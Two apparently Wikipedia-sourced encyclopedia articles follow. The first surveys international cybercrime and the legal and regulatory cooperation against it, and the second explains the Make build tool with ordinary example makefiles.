There is no commonly agreed single definition of "cybercrime". It refers to illegal internet-mediated activities that often take place in global electronic networks. Cybercrime is "international" or "transnational" – there are 'no cyber-borders between countries'. International cybercrimes often challenge the effectiveness of domestic and international law and law enforcement. Because existing laws in many countries are not tailored to deal with cybercrime, criminals increasingly conduct crimes on the Internet in order to take advantage of less severe punishments or the difficulty of being traced. In both developing and developed countries, governments and industries have gradually realized the colossal threats that cybercrime poses to economic and political security and public interests. However, the complexity of the types and forms of cybercrime increases the difficulty of fighting back. In this sense, fighting cybercrime calls for international cooperation. Various organizations and governments have already made joint efforts in establishing global standards of legislation and law enforcement both on a regional and on an international scale. China–United States cooperation is one of the most striking recent developments, because the two are the top source countries of cybercrime.
Information and communication technology (ICT) plays an important role in helping ensure interoperability and security based on global standards. General countermeasures have been adopted in cracking down cybercrime, such as legal measures in perfecting legislation and technical measures in tracking down crimes over the network, Internet content control, using public or private proxy and computer forensics, encryption and plausible deniability, etc. Due to the heterogeneity of law enforcement and technical countermeasures of different countries, this article will mainly focus on legislative and regulatory initiatives of international cooperation.
Typology
In terms of cybercrime, we may often associate it with various forms of Internet attacks, such as hacking, Trojans, malware (keyloggers), botnet, Denial-of-Service (DoS), spoofing, phishing, and vishing. Though cybercrime encompasses a broad range of illegal activities, it can be generally divided into five categories:
Intrusive Offenses
Illegal Access: “Hacking” is one of the major forms of offenses that refers to unlawful access to a computer system.
Data Espionage: Offenders can intercept communications between users (such as e-mails) by targeting communication infrastructure such as fixed lines or wireless, and any Internet service (e.g., e-mail servers, chat or VoIP communications).
Data Interference: Offenders can violate the integrity of data and interfere with them by deleting, suppressing, or altering data and restricting access to them.
Content-related offenses
Pornographic Material (Child-Pornography): Sexually related content was among the first content to be commercially distributed over the Internet.
Racism, Hate Speech, Glorification of Violence: Radical groups use mass communication systems such as the Internet to spread propaganda.
Religious Offenses: A growing number of websites present material that is in some countries covered by provisions related to religious offenses, e.g., anti-religious written statements.
Spam: Offenders send out bulk mail from unidentified sources; the mail often contains useless advertisements and pictures.
Copyright and trademark-related offenses
Common copyright offenses: cyber copyright infringement of software, music or films.
Trademark violations: A well-known aspect of global trade. The most serious offenses include phishing and domain or name-related offenses, such as cybersquatting.
Computer-related offenses
Fraud: online auction fraud, advance fee fraud, credit card fraud, Internet banking
Forgery: manipulation of digital documents.
Identity theft: It refers to stealing private information including Social Security Numbers (SSN), passport numbers, Date of birth, addresses, phone numbers, and passwords for non-financial and financial accounts.
Combination offenses
Cyberterrorism: The main purposes of it are propaganda, information gathering, preparation of real-world attacks, publication of training material, communication, terrorist financing and attacks against critical infrastructure.
Cyberwarfare: It describes the use of ICTs in conducting warfare using the Internet.
Cyberlaundering: Conducting crime through the use of virtual currencies, online casinos etc.
Threats
Similar to conventional crime, economic benefits, power, revenge, adventure, ideology and lust are the core driving forces of cybercrime. Major threats caused by those motivations can be categorized as following:
Economic security, reputation and social trust are severely challenged by cyber fraud, counterfeiting, impersonation and concealment of identity, extortion, electronic money laundering, copyright infringement and tax evasion.
Public interest and national security are threatened by the dissemination of offensive material —e.g., pornographic, defamatory or inflammatory/intrusive communication— cyber stalking/harassment, child pornography and paedophilia, and electronic vandalism/terrorism.
Privacy, domestic and even diplomatic information security are harmed by unauthorized access and misuse of ICT, denial of services, and illegal interception of communication.
Domestic as well as international security is threatened by cybercrime due to its transnational character. No single country can really handle this big issue on its own. It is imperative to collaborate and defend against cybercrime on a global scale.
International trends
As more and more criminals are aware of potentially large economic gains that can be achieved with cybercrime, they tend to switch from simple adventure and vandalism to more targeted attacks, especially platforms where valuable information highly concentrates, such as computer, mobile devices and the Cloud. There are several emerging international trends of cybercrime.
Platform switch: Cybercrime is switching its battleground from Windows-system PCs to other platforms, including mobile phones, tablet computers, and VoIP, because a significant threshold in vulnerabilities has been reached and PC vendors are building better security into their products by providing faster updates, patches and user alerts to potential flaws. In addition, global penetration of mobile devices accessing the Internet—from smartphones to tablet PCs—was expected to surpass 1 billion by 2013, creating more opportunities for cybercrime. The massively successful banking Trojan Zeus is already being adapted for the mobile platform. Smishing, or SMS phishing, is another method cyber criminals are using to exploit mobile devices: malware, which users download after falling prey to a social engineering ploy, is designed to defeat the SMS-based two-factor authentication most banks use to confirm online funds transfers by customers. VoIP systems are being used to support vishing (telephone-based phishing) schemes, which are now growing in popularity.
Social engineering scams: It refers to a non-technical kind of intrusion, in the form of e-mails or social networking chats, that relies heavily on human interaction and often involves fooling potential victims into downloading malware or leaking personal data. Social engineering is nevertheless highly effective for attacking well-protected computer systems with the exploitation of trust. Social networking becomes an increasingly important tool for cyber criminals to recruit money mules to assist their money laundering operations around the globe. Spammers are not only spoofing social networking messages to persuade targets to click on links in emails — they are taking advantage of users’ trust of their social networking connections to attract new victims.
Highly targeted: The newest twist in "hypertargeting" is malware that is meant to disrupt industrial systems — such as the Stuxnet network worm, which exploits zero-day vulnerabilities in Microsoft Windows. The first known copy of the worm was discovered in a plant in Germany. A subsequent variant led to a widespread global outbreak.
Dissemination and use of malware: malware generally takes the form of a virus, a worm, a Trojan horse, or spyware. In 2009, the majority of malware connected to host web sites registered in the U.S.A. (51.4%), with China second (17.2%) and Spain third (15.7%). A primary means of malware dissemination is email. It is truly international in scope.
Intellectual property theft (IP theft): It is estimated that 90% of the software, DVDs, and CDs sold in some countries are counterfeit, and that the total global trade in counterfeit goods is more than $600 billion a year. In the USA alone, IP theft costs businesses an estimated $250 billion annually, and 750,000 jobs.
International legislative responses and cooperation
International responses
G8
Group of Eight (G8) is made up of the heads of eight industrialized countries: the U.S., the United Kingdom, Russia, France, Italy, Japan, Germany, and Canada.
In 1997, G8 released a Ministers' Communiqué that includes an action plan and principles to combat cybercrime and protect data and systems from unauthorized impairment. G8 also mandates that all law enforcement personnel must be trained and equipped to address cybercrime, and designates all member countries to have a point of contact on a 24 hours a day/7 days a week basis.
United Nations
In 1990 the UN General Assembly adopted a resolution dealing with computer crime legislation.
In 2000 the UN GA adopted a resolution on combating the criminal misuse of information technology.
In 2002 the UN GA adopted a second resolution on the criminal misuse of information technology.
ITU
The International Telecommunication Union (ITU), as a specialized agency within the United Nations, plays a leading role in the standardization and development of telecommunications and cybersecurity issues. The ITU was the lead agency of the World Summit on the Information Society (WSIS).
In 2003, Geneva Declaration of Principles and the Geneva Plan of Action were released, which highlights the importance of measures in the fight against cybercrime.
In 2005, the Tunis Commitment and the Tunis Agenda were adopted for the Information Society.
Council of Europe
Council of Europe is an international organisation focusing on the development of human rights and democracy in its 47 European member states.
In 2001, the Convention on Cybercrime, the first international convention aimed at Internet criminal behaviors, was co-drafted by the Council of Europe with the participation of the USA, Canada, and Japan and signed by its 46 member states, although only 25 countries later ratified it. It aims at providing the basis of an effective legal framework for fighting cybercrime through harmonization of the qualification of cybercrime offenses, provision of laws empowering law enforcement, and enabling of international cooperation.
Regional responses
APEC
Asia-Pacific Economic Cooperation (APEC) is an international forum that seeks to promote open trade and practical economic cooperation in the Asia-Pacific region.
In 2002, APEC issued Cybersecurity Strategy which is included in the Shanghai Declaration. The strategy outlined six areas for co-operation among member economies including legal developments, information sharing and co-operation, security and technical guidelines, public awareness, and training and education.
OECD
The Organisation for Economic Co-operation and Development (OECD) is an international economic organisation of 34 countries founded in 1961 to stimulate economic progress and world trade.
In 1990, the Information, Computer and Communications Policy (ICCP) Committee created an Expert Group to develop a set of guidelines for information security, which were completed in 1992 and then adopted by the OECD Council. In 2002, the OECD announced the completion of "Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security".
European Union
In 2001, the European Commission published a communication titled "Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime".
In 2002, EU presented a proposal for a “Framework Decision on Attacks against Information Systems”. The Framework Decision takes note of Convention on Cybercrime, but concentrates on the harmonisation of substantive criminal law provisions that are designed to protect infrastructure elements.
Commonwealth
In 2002, the Commonwealth of Nations presented a model law on cybercrime that provides a legal framework to harmonise legislation within the Commonwealth and enable international cooperation. The model law was intentionally drafted in accordance with the Convention on Cybercrime.
ECOWAS
The Economic Community of West African States (ECOWAS) is a regional group of West African countries founded in 1975; it has fifteen member states. In 2009, ECOWAS adopted the Directive on Fighting Cybercrime in ECOWAS, which provides a legal framework for the member states that includes substantive criminal law as well as procedural law.
GCC
In 2007, the Arab League and the Gulf Cooperation Council (GCC) recommended at a conference a joint approach that takes international standards into consideration.
Voluntary industry response
During the past few years, public-private partnerships have emerged as a promising approach for tackling cybersecurity issues around the globe. Executive branch agencies (e.g., the Federal Trade Commission in US), regulatory agencies (e.g., Australian Communications and Media Authority), separate agencies (e.g., ENISA in the EU) and industry (e.g., MAAWG, …) are all involved in partnership.
In 2004, the London Action Plan was founded, which aims at promoting international spam enforcement cooperation and addressing spam-related problems, such as online fraud and deception, phishing, and dissemination of viruses.
Case analysis
U.S.
According to Sophos, the U.S. remains the top-spamming country and the source of about one-fifth of the world's spam. Cross-border cyber-exfiltration operations are in tension with international legal norms, so U.S. law enforcement efforts to collect foreign cyber evidence raise complex jurisdictional questions. Since fighting cybercrime involves a great number of sophisticated legal and other measures, only milestones rather than full texts are provided here.
Legal and regulatory measures
The first federal computer crime statute was the Computer Fraud and Abuse Act of 1984 (CFAA).
In 1986, Electronic Communications Privacy Act (ECPA) was an amendment to the federal wiretap law.
“National Infrastructure Protection Act of 1996”.
“Cyberspace Electronic Security Act of 1999”.
“Patriot Act of 2001”.
Digital Millennium Copyright Act (DMCA) was enacted in 1998.
Cyber Security Enhancement Act (CSEA) was passed in 2002.
The CAN-SPAM Act was issued in 2003, and subsequent implementation measures were made by the FCC and FTC.
In 2005 the USA passed the Anti-Phishing Act which added two new crimes to the US Code.
In 2009, the Obama Administration released Cybersecurity Report and policy.
Cybersecurity Act of 2010, a bill seeking to increase collaboration between the public and the private sector on cybersecurity issues.
A number of agencies have been set up in the U.S. to fight against cybercrime, including the FBI, National Infrastructure Protection Center, National White Collar Crime Center, Internet Fraud Complaint Center, Computer Crime and Intellectual Property Section of the Department of Justice (DoJ), Computer Hacking and Intellectual Property Unit of the DoJ, and Computer Emergency Readiness Team/Coordination Center (CERT/CC) at Carnegie-Mellon, and so on.
CyberSafe is a public service project designed to educate end users of the Internet about the critical need for personal computer security.
Technical measures
Cloud computing: It can make infrastructures more resilient to attacks and functions as data backup as well. However, as the Cloud concentrates more and more sensitive data, it becomes increasingly attractive to cybercriminals.
Better encryption methods are developed to deal with phishing, smishing and other illegal data interception activities.
The Federal Bureau of Investigation has set up special technical units and developed Carnivore, a computer surveillance system which can intercept all packets that are sent to and from the ISP where it is installed, to assist in the investigation of cybercrime.
Industry collaboration
Public-private partnership: in 2006, the Internet Corporation for Assigned Names and Numbers (ICANN) signed an agreement with the United States Department of Commerce under which they partnered through the Multistakeholder Model of consultation.
In 2008, the second annual Cyber Storm Exercise conference was held, involving nine states, four foreign governments, 18 federal agencies and 40 private companies.
In 2010, National Cyber Security Alliance’s public awareness campaign was launched in partnership with the U.S. Department of Homeland Security, the Federal Trade Commission, and others.
Incentives for ISPs: Though the cost of security measures increases, Internet service providers (ISPs) are encouraged to fight cybercrime in order to win consumer support and a good reputation and brand image among consumers and peer ISPs.
International cooperation
USA has signed and also ratified Convention on Cybercrime.
United States has actively participated in G8/OECD/APEC/OAS/U.S.-China cooperation in cracking down international cyber crime.
Future challenges
Privacy in tracking down cybercrime is being challenged and becomes a controversial issue.
Public-private partnership. As the U.S. government gets more involved in the development of IT products, many companies worry this may stifle their innovation and even undermine efforts to develop more secure technology products. New legislative proposals now being considered by the U.S. Congress could be potentially intrusive on private industry, which may prevent enterprises from responding effectively to emerging and changing threats. Cyber attacks and security breaches are increasing in frequency and sophistication, targeting organizations and individuals with malware and anonymization techniques that can evade current security controls. Current perimeter-intrusion detection, signature-based malware detection, and anti-virus solutions are providing little defense. Relatively few organizations have recognized organized cyber criminal networks, rather than hackers, as their greatest potential cyber security threat; even fewer are prepared to address this threat.
China
In January 2009, China was ranked No.3 spam-producing country in the world, according to data compiled by security vendor Sophos. Sophos now ranks China as spam producer No.20, right behind Spain.
China's underground economy is booming, with an estimated value of 10 billion RMB in 2009. Hacking, malware and spam are immensely popular. With patriotic hacktivism, people hack to defend the country.
Legal and regulatory measures
Criminal Law – the basic law identifies the law enforcement concerning cybercrime.
In 2000, the Decision on Internet Security of the Standing Committee of the NPC was passed.
In 2000, China issued a series of Internet rules that prohibit anyone from propagating pornography, viruses and scams.
In 2003, China signed UN General Assembly Resolution 57/239 on “Creation of a global culture of cybersecurity”.
In 2003, China signed Geneva Declaration of Principles of the World Summit on the Information Society.
In 2006, an anti-spam initiative was launched.
In July 2006, the ASEAN Regional Forum (ARF), which included China, issued a statement that its members should implement cybercrime and cybersecurity laws “in accordance with their national conditions and by referring to relevant international instruments”.
In 2009, the ASEAN-China framework agreement on network and information security emergency response was adopted.
In 2009, agreement within the Shanghai Cooperation Organization on information security was made.
Technical measures
Internet censorship: China has made it tougher to register new Internet domains and has put on stricter content control to help reduce spam.
"Golden Shield Project" or "The Great Firewall of China": a national Internet control and censorship project.
In 2009, Green Dam software: it restricts access to a secret list of sites and monitors users' activity.
Operating system change: China is trying to get around this by using Linux, though with a lot of technical impediments to solve.
Industry collaboration
Internet Society of China — the group behind China's anti-spam effort — is working on standards and better ways of cooperating to fight cybercrime.
ISPs have become better at working with customers to cut down on the spam problem.
International cooperation
In 2005, China signed up for the London Action Plan on spam, an international effort to curb the problem.
The Anti-Spam "Beijing Declaration" was adopted at the 2006 International Anti-Spam Summit.
The APEC Working Group on Telecommunications agreed on an action plan for 2010–2015 that included "fostering a safe and trusted ICT environment".
In January 2011, the United States and China committed for the first time at head of state level to work together on a bilateral basis on issues of cybersecurity. "Fighting Spam to Build Trust" will be the first effort to help overcome the trust deficit between China and the United States on cybersecurity. Cyber Security China Summit 2011 will be held in Shanghai.
Achievement and future challenges
Spam volume was successfully reduced in 2009. However, insufficient criminal laws and regulations remain great impediments to fighting cybercrime. The lack of electronic evidence laws or regulations, the low rank of existing Internet control regulations, and technological impediments altogether limit the efficiency of Chinese governments' law enforcement.
See also
Computer crime
Computer security
Convention on Cybercrime
Cyberethics
Cyberstalking
Identity theft
Internet fraud
Legal aspects of computing
References
External links
ITU Global Cybersecurity Agenda
Convention on Cybercrime
Sophos Security Reports
US-China Joint Efforts in Cybercrime, EastWest Institute
Computer Crime & Intellectual Property Section, United States Department of Justice
Handbook of Legal Procedures of Computer and Network Misuse in EU Countries
Cybercrime
International criminal law
|
176194
|
https://en.wikipedia.org/wiki/Make%20%28software%29
|
Make (software)
|
In software development, Make is a build automation tool that automatically builds executable programs and libraries from source code by reading files called Makefiles which specify how to derive the target program. Though integrated development environments and language-specific compiler features can also be used to manage a build process, Make remains widely used, especially in Unix and Unix-like operating systems.
Besides building programs, Make can be used to manage any project where some files must be updated automatically from others whenever the others change.
Origin
There are now a number of dependency-tracking build utilities, but Make is one of the most widespread, primarily due to its inclusion in Unix, starting with the PWB/UNIX 1.0, which featured a variety of tools targeting software development tasks. It was originally created by Stuart Feldman in April 1976 at Bell Labs. Feldman received the 2003 ACM Software System Award for the authoring of this widespread tool.
Feldman was inspired to write Make by the experience of a coworker in futilely debugging a program of his where the executable was accidentally not being updated with changes:
Before Make's introduction, the Unix build system most commonly consisted of operating system dependent "make" and "install" shell scripts accompanying their program's source. Being able to combine the commands for the different targets into a single file and being able to abstract out dependency tracking and archive handling was an important step in the direction of modern build environments.
Derivatives
Make has gone through a number of rewrites, including a number of from-scratch variants which used the same file format and basic algorithmic principles and also provided a number of their own non-standard enhancements. Some of them are:
Sun DevPro Make appeared in 1986 with SunOS-3.2. With SunOS-3.2, it was delivered as an optional program; with SunOS-4.0, SunPro Make was made the default Make program. In December 2006, Sun DevPro Make was made open source as part of the efforts to open-source Solaris.
dmake or Distributed Make, which came with Sun Solaris Studio as its default Make, but is not the default one on the Solaris Operating System (SunOS). It was originally required to build OpenOffice, but in 2009 the build system was rewritten to use GNU Make. While Apache OpenOffice still contains a mixture of both build systems, the much more actively developed LibreOffice now uses only the modernized "gbuild".
BSD Make (pmake, bmake or fmake), which is derived from Adam de Boor's work on a version of Make capable of building targets in parallel, and survives with varying degrees of modification in FreeBSD, NetBSD and OpenBSD. Distinctively, it has conditionals and iterative loops which are applied at the parsing stage and may be used to conditionally and programmatically construct the makefile, including generation of targets at runtime.
GNU Make (short gmake) is the standard implementation of Make for Linux and macOS. It provides several extensions over the original Make, such as conditionals. It also provides many built-in functions which can be used to eliminate the need for shell-scripting in the makefile rules as well as to manipulate the variables set and used in the makefile. For example, the foreach function can be used to iterate over a list of values, such as the names of files in a given directory. GNU Make is required for building many software systems, including GCC (since version 3.4), the Linux kernel, Apache OpenOffice, LibreOffice, and Mozilla Firefox.
Rocky Bernstein's Remake is a fork of GNU Make and provides several extensions over GNU Make, such as better location and error-location reporting, execution tracing, execution profiling, and it contains a debugger.
Glenn Fowler's nmake is unrelated to the Microsoft program of the same name. Its input is similar to Make, but not compatible. This program provides shortcuts and built-in features, which according to its developers reduces the size of makefiles by a factor of 10.
Microsoft nmake, a command-line tool which normally is part of Visual Studio. It supports preprocessor directives such as includes and conditional expressions which use variables set on the command-line or within the makefiles. Inference rules differ from Make; for example they can include search paths. The Make tool supplied with Embarcadero products has a command-line option that "Causes MAKE to mimic Microsoft's NMAKE.". Qt Project's Jom tool is a clone of nmake.
Mk replaced Make in Research Unix, starting from version 9. A redesign of the original tool by Bell Labs programmer Andrew G. Hume, it features a different syntax. Mk became the standard build tool in Plan 9, Bell Labs' intended successor to Unix.
Kati is Google's replacement of GNU Make, used in Android OS builds. It translates the makefile into ninja for faster incremental builds.
POSIX includes standardization of the basic features and operation of the Make utility, and is implemented with varying degrees of completeness in Unix-based versions of Make. In general, simple makefiles may be used between various versions of Make with reasonable success. GNU Make, Makepp and some versions of BSD Make default to looking first for files named "GNUmakefile", "Makeppfile" and "BSDmakefile" respectively, which allows one to put makefiles which use implementation-defined behavior in separate locations.
Behavior
Make is typically used to build executable programs and libraries from source code. Generally though, Make is applicable to any process that involves executing arbitrary commands to transform a source file to a target result. For example, Make could be used to detect a change made to an image file (the source) and the transformation actions might be to convert the file to some specific format, copy the result into a content management system, and then send e-mail to a predefined set of users indicating that the actions above were performed.
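A minimal sketch of such a non-compilation makefile (the file names, the ImageMagick convert command, the web directory and the mail recipient are all illustrative assumptions, not part of the example above):
# Regenerate logo.png whenever logo.svg changes, publish it and notify users.
# Recipe lines must begin with a tab character.
logo.png: logo.svg
	convert logo.svg logo.png
	cp logo.png /var/www/cms/images/
	echo "logo.png was regenerated" | mail -s "Asset updated" team@example.com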
Make is invoked with a list of target file names to build as command-line arguments:
make [TARGET ...]
Without arguments, Make builds the first target that appears in its makefile, which is traditionally a symbolic "phony" target named all.
Make decides whether a target needs to be regenerated by comparing file modification times. This avoids rebuilding files that are already up to date, but it fails when a file changes while its modification time stays in the past. Such changes could be caused by restoring an older version of a source file, or when a network filesystem is a source of files and its clock or time zone is not synchronized with the machine running Make. The user must handle this situation by forcing a complete build. Conversely, if a source file's modification time is in the future, it triggers unnecessary rebuilding, which may inconvenience users.
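With GNU Make, for instance, a complete rebuild can be forced either by updating the timestamps with touch or with the --always-make (-B) option; a brief sketch:
touch src/*.c   # bump the modification times so dependent targets appear out of date
make            # rebuild according to the updated timestamps
make -B         # GNU Make only: unconditionally remake all targets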
Makefiles are traditionally used for compiling code (*.c, *.cc, *.C, etc.), but they can also be used for providing commands to automate common tasks. One such makefile is called from the command line:
make # Without argument runs first TARGET
make help # Show available TARGETS
make dist # Make a release archive from current dir
Makefile
Make searches the current directory for the makefile to use. GNU Make, for example, searches in order for a file named "GNUmakefile", "makefile", or "Makefile", and then runs the specified (or default) target(s) from (only) that file.
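A makefile in another location, or with a non-default name, can be selected explicitly with the standard -f option (the file name build.mk is illustrative):
make -f build.mk all   # read rules from build.mk instead of the default makefile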
The makefile language is similar to declarative programming. This class of language, in which necessary end conditions are described but the order in which actions are to be taken is not important, is sometimes confusing to programmers used to imperative programming.
One problem in build automation is the tailoring of a build process to a given platform. For instance, the compiler used on one platform might not accept the same options as the one used on another. This is not well handled by Make. This problem is typically handled by generating platform-specific build instructions, which in turn are processed by Make. Common tools for this process are Autoconf, CMake or GYP (or more advanced NG).
Makefiles may contain five kinds of things, combined in the short example after this list:
An explicit rule says when and how to remake one or more files, called the rule's targets. It lists the other files that the targets depend on, called the prerequisites of the target, and may also give a recipe to use to create or update the targets.
An implicit rule says when and how to remake a class of files based on their names. It describes how a target may depend on a file with a name similar to the target and gives a recipe to create or update such a target.
A variable definition is a line that specifies a text string value for a variable that can be substituted into the text later.
A directive is an instruction for make to do something special while reading the makefile such as reading another makefile.
Lines starting with # are used for comments.
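A minimal GNU Make sketch combining all five kinds (the file names and flags are illustrative; recipe lines begin with a tab):
# A comment line (the fifth kind).
# A directive (the fourth kind): read another makefile if it exists.
-include config.mk
# A variable definition (the third kind):
CFLAGS = -O2
# An explicit rule (the first kind): target, prerequisite and recipe.
prog: prog.o
	$(CC) $(CFLAGS) -o prog prog.o
# An implicit rule (the second kind), written here as a GNU-style pattern rule:
%.o: %.c
	$(CC) $(CFLAGS) -c $<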
Rules
A makefile consists of rules. Each rule begins with a textual dependency line which defines a target followed by a colon (:) and optionally an enumeration of components (files or other targets) on which the target depends. The dependency line is arranged so that the target (left hand of the colon) depends on components (right hand of the colon). It is common to refer to components as prerequisites of the target.
target [target ...]: [component ...]
[command 1]
.
.
.
[command n]
Usually each rule has a single unique target, rather than multiple targets.
For example, a C .o object file is created from .c files, so .c files come first (i.e. specific object file target depends on a C source file and header files). Because Make itself does not understand, recognize or distinguish different kinds of files, this opens up a possibility for human error. A forgotten or an extra dependency may not be immediately obvious and may result in subtle bugs in the generated software. It is possible to write makefiles which generate these dependencies by calling third-party tools, and some makefile generators, such as the Automake toolchain provided by the GNU Project, can do so automatically.
Each dependency line may be followed by a series of TAB indented command lines which define how to transform the components (usually source files) into the target (usually the "output"). If any of the prerequisites has a more recent modification time than the target, the command lines are run. The GNU Make documentation refers to the commands associated with a rule as a "recipe".
The first command may appear on the same line after the prerequisites, separated by a semicolon,
targets : prerequisites ; command
for example,
hello: ; @echo "hello"
Make can decide where to start through topological sorting.
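For instance, in the sketch below (the generate-report script is a hypothetical placeholder), asking for the final target makes Make run the recipes in dependency order:
report.pdf: report.tex
	pdflatex report.tex
report.tex: data.csv
	./generate-report data.csv > report.tex
Invoking make report.pdf therefore first regenerates report.tex from data.csv if needed, and only then rebuilds report.pdf.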
Each command line must begin with a tab character to be recognized as a command. The tab is a whitespace character, but the space character does not have the same special meaning. This is problematic, since there may be no visual difference between a tab and a series of space characters. This aspect of the syntax of makefiles is often subject to criticism; it has been described by Eric S. Raymond as "one of the worst design botches in the history of Unix" and The Unix-Haters Handbook said "using tabs as part of the syntax is like one of those pungee stick traps in The Green Berets". Feldman explains the choice as caused by a workaround for an early implementation difficulty preserved by a desire for backward compatibility with the very first users:
However, since version 3.82, GNU Make allows the recipe prefix to be changed to any single character via the .RECIPEPREFIX special variable, for example:
.RECIPEPREFIX := :
all:
:@echo "recipe prefix symbol is set to '$(.RECIPEPREFIX)'"
Each command is executed by a separate shell or command-line interpreter instance. Since operating systems use different command-line interpreters, this can lead to unportable makefiles. For instance, GNU Make (and all POSIX Makes) by default executes commands with /bin/sh, where Unix commands like cp are normally used. In contrast, Microsoft's nmake executes commands with cmd.exe, where batch commands like copy are available but not necessarily cp.
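As an illustration, the same file-copy rule would be written differently for the two tools (a sketch; the file names are arbitrary):
# In a makefile processed by a POSIX Make, commands are run by /bin/sh:
backup: data.txt
	cp data.txt data.bak
# In a makefile processed by Microsoft nmake, commands are run by cmd.exe:
backup: data.txt
	copy data.txt data.bak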
A rule may have no command lines defined. The dependency line can consist solely of components that refer to targets, for example:
realclean: clean distclean
The command lines of a rule are usually arranged so that they generate the target. An example: if "file.html" is newer, it is converted to text. The contents of the makefile:
file.txt: file.html
lynx -dump file.html > file.txt
The rule above would be triggered when Make updates "file.txt". In the following invocation, Make would typically use this rule to update the "file.txt" target if "file.html" were newer.
make file.txt
Command lines can have one or more of the following three prefixes:
a hyphen-minus (-), specifying that errors are ignored
an at sign (@), specifying that the command is not printed to standard output before it is executed
a plus sign (+), the command is executed even if Make is invoked in a "do not execute" mode
Ignoring errors and silencing all echoing can alternatively be obtained via the special targets .IGNORE and .SILENT.
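A short sketch showing all three prefixes in one recipe:
clean:
	@echo "cleaning up"   # @ : this echo command itself is not printed before running
	-rm *.o core          # - : an error (for example, no such files) is ignored
	+touch .cleaned       # + : runs even under make -n, -t or -q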
Microsoft's NMAKE has predefined inference rules (for example, for building a .obj object file from a .c source file) that can be omitted from these makefiles.
Macros
A makefile can contain definitions of macros. Macros are usually referred to as variables when they hold simple string definitions, such as CC = cc, which names the C compiler. Macros in makefiles may be overridden in the command-line arguments passed to the Make utility. Environment variables are also available as macros.
Macros allow users to specify the programs invoked and other custom behavior during the build process. For example, the macro CC is frequently used in makefiles to refer to the location of a C compiler, and the user may wish to specify a particular compiler to use.
New macros (or simple "variables") are traditionally defined using capital letters:
MACRO = definition
A macro is used by expanding it. Traditionally this is done by enclosing its name inside $(). (Omitting the parentheses leads to Make interpreting the next letter after the $ as the entire variable name.) An equivalent form uses curly braces rather than parentheses, i.e. ${}, which is the style used in the BSDs.
NEW_MACRO = $(MACRO)-$(MACRO2)
Macros can be composed of shell commands by using the command substitution operator, denoted by backticks (`).
YYYYMMDD = ` date `
The content of the definition is stored "as is". Lazy evaluation is used, meaning that macros are normally expanded only when their expansions are actually required, such as when used in the command lines of a rule. An extended example:
PACKAGE = package
VERSION = ` date +"%Y.%m.%d" `
ARCHIVE = $(PACKAGE)-$(VERSION)
dist:
# Notice that only now macros are expanded for shell to interpret:
# tar -cf package-`date +"%Y.%m.%d"`.tar
tar -cf $(ARCHIVE).tar .
The generic syntax for overriding macros on the command line is:
make MACRO="value" [MACRO="value" ...] TARGET [TARGET ...]
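For example, assuming the makefile uses the conventional CC and CFLAGS macros, the compiler and its flags can be overridden for a single build:
make CC=clang CFLAGS="-O2 -Wall" all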
Makefiles can access any of a number of predefined internal macros, with $? and $@ being the most common.
target: component1 component2
# $? contains those components which need attention (i.e. they ARE YOUNGER than current TARGET).
echo $?
# $@ evaluates to the current TARGET name from among those left of the colon.
echo $@
A somewhat common syntax expansion is the use of +=, ?=, and != instead of the equals sign. It works on BSD and GNU makes alike.
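A brief sketch of these assignment operators (the != form requires GNU Make 4.0 or later, or a BSD make):
# Assign only if CFLAGS is not already defined (for example, in the environment):
CFLAGS ?= -g
# Append to the current value:
CFLAGS += -Wall
# Run a shell command and assign its output:
BUILD_DATE != date +%Y-%m-%d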
Suffix rules
Suffix rules have "targets" with names in the form .FROM.TO and are used to launch actions based on file extension. In the command lines of suffix rules, POSIX specifies that the internal macro $< refers to the first prerequisite and $@ refers to the target. In this example, which converts any HTML file into text, the shell redirection token > is part of the command line whereas $< is a macro referring to the HTML file:
.SUFFIXES: .txt .html
# From .html to .txt
.html.txt:
lynx -dump $< > $@
When called from the command line, the example above expands to:
$ make -n file.txt
lynx -dump file.html > file.txt
Pattern rules
Suffix rules cannot have any prerequisites of their own. If they have any, they are treated as normal files with unusual names, not as suffix rules. GNU Make supports suffix rules for compatibility with old makefiles but otherwise encourages usage of pattern rules.
A pattern rule looks like an ordinary rule, except that its target contains exactly one '%' character. The target is considered a pattern for matching file names: the '%' can match any substring of zero or more characters, while other characters match only themselves. The prerequisites likewise use '%' to show how their names relate to the target name.
The example above of a suffix rule would look like the following pattern rule:
# From %.html to %.txt
%.txt : %.html
lynx -dump $< > $@
Other elements
Single-line comments are started with the hash symbol (#).
Some directives in makefiles can include other makefiles, as illustrated after the line-continuation example below.
Line continuation is indicated with a backslash character at the end of a line.
target: component \
component
command ; \
command | \
piped-command
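A sketch of the include directive mentioned above; the file common.mk is an assumed name for a file holding settings shared between several makefiles:
# Main makefile: read the shared variable definitions (e.g. CC and CFLAGS) first.
include common.mk
prog: prog.c
	$(CC) $(CFLAGS) -o prog prog.c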
Example makefiles
The makefile:
PACKAGE = package
VERSION = ` date +"%Y.%m.%d" `
RELEASE_DIR = ..
RELEASE_FILE = $(PACKAGE)-$(VERSION)
# Notice that the variable LOGNAME comes from the environment in
# POSIX shells.
#
# target: all - Default target. Does nothing.
all:
echo "Hello $(LOGNAME), nothing to do by default"
# sometimes: echo "Hello ${LOGNAME}, nothing to do by default"
echo "Try 'make help'"
# target: help - Display callable targets.
help:
egrep "^# target:" [Mm]akefile
# target: list - List source files
list:
# Won't work. Each command is in separate shell
cd src
ls
# Correct, continuation of the same shell
cd src; \
ls
# target: dist - Make a release.
dist:
tar -cf $(RELEASE_DIR)/$(RELEASE_FILE).tar . && \
gzip -9 $(RELEASE_DIR)/$(RELEASE_FILE).tar
Below is a very simple makefile that by default (the "all" rule is listed first) compiles a source file called "helloworld.c" using the system's C compiler and also provides a "clean" target to remove the generated files if the user desires to start over. The $@ and $< are two of the so-called internal macros (also known as automatic variables) and stand for the target name and "implicit" source, respectively. In the example below, $^ expands to a space-delimited list of the prerequisites. There are a number of other internal macros.
CFLAGS ?= -g
all: helloworld
helloworld: helloworld.o
# Commands start with TAB not spaces
$(CC) $(LDFLAGS) -o $@ $^
helloworld.o: helloworld.c
$(CC) $(CFLAGS) -c -o $@ $<
clean: FRC
$(RM) helloworld helloworld.o
# This pseudo target causes all targets that depend on FRC
# to be remade even in case a file with the name of the target exists.
# This works with any make implementation under the assumption that
# there is no file FRC in the current directory.
FRC:
Many systems come with predefined Make rules and macros to specify common tasks such as compilation based on file suffix. This lets users omit the actual (often unportable) instructions of how to generate the target from the source(s). On such a system the makefile above could be modified as follows:
all: helloworld
helloworld: helloworld.o
